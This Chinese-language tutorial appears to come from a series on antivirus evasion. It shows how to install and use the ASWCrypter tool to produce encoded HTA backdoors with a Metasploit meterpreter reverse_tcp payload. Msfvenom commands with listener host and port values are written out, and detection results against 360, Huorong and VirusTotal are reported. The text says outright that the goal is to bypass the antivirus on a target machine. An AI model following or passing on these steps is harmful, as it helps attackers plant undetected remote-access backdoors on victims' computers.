免殺能力一覽表
幾點說明:
1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。
2、爲了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
3、由於本機測試時只是安裝了360全家桶和火絨,所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛士12.0.0.2002(2020.01.01)。
4、其他殺軟的檢測指標是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態查殺能力,數據僅供參考,不足以作爲免殺或殺軟查殺能力的判斷指標。
5、完全不必要苛求一種免殺技術能bypass所有殺軟,這樣的技術肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標主機上的殺軟就足夠了。
一、ASWCrypter介紹
ASWCrypter是2018年開源的免殺工具,原理比較簡單,使用msf生成hta代碼,然後使用python腳本對hta代碼進行一定編碼處理,生成新的hta後門文件,從而達到免殺效果。
二、安裝ASWCrypter
需要本機安裝metasploit和python環境。
ASWCrypter的安裝比較簡單,先git clone到本地
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
進入ASWCrypter目錄,執行chmod +x ./ASWCrypter.sh。
執行./ASWCrypter.sh即可運行ASWCrypter。
三、ASWCrypter使用說明
使用時需要注意的只有一點,就是要在linux桌面環境中運行,因爲在ASWCrypter.sh腳本中,調用msfvenom生成後門時使用了xterm。
xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"
四、利用ASWCrypter生成後門
執行./ASWCrypter.sh,選擇G,第一步也只有這個能選
然後輸入LHOST和LPORT
後門選擇payload,我還是選擇最常規的reverse_tcp了,文件名就隨便輸一個了
之後提示生成test4.hta成功,後面會提示是否開啓msf監聽,我這就不需要了,還是在mac上監聽端口。
不開殺軟的時候可正常上線
打開殺軟,火絨靜態和動態都能查殺,360動態+靜態都沒報警。
試了下msfvenom生成的原始的hta文件的查殺率
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta
virustotal.com上查殺率爲28/56
五、ASWCrypter小結
ASWCrypter是使用msfvenom生成基於powershell的hta後門文件,然後進行編碼處理,達到一定的免殺效果,不過因爲會調用powershell,行爲檢測還是很容易被檢測出來。
六、參考資料
官方Github:https://github.com/abedalqaderswedan1/aswcrypter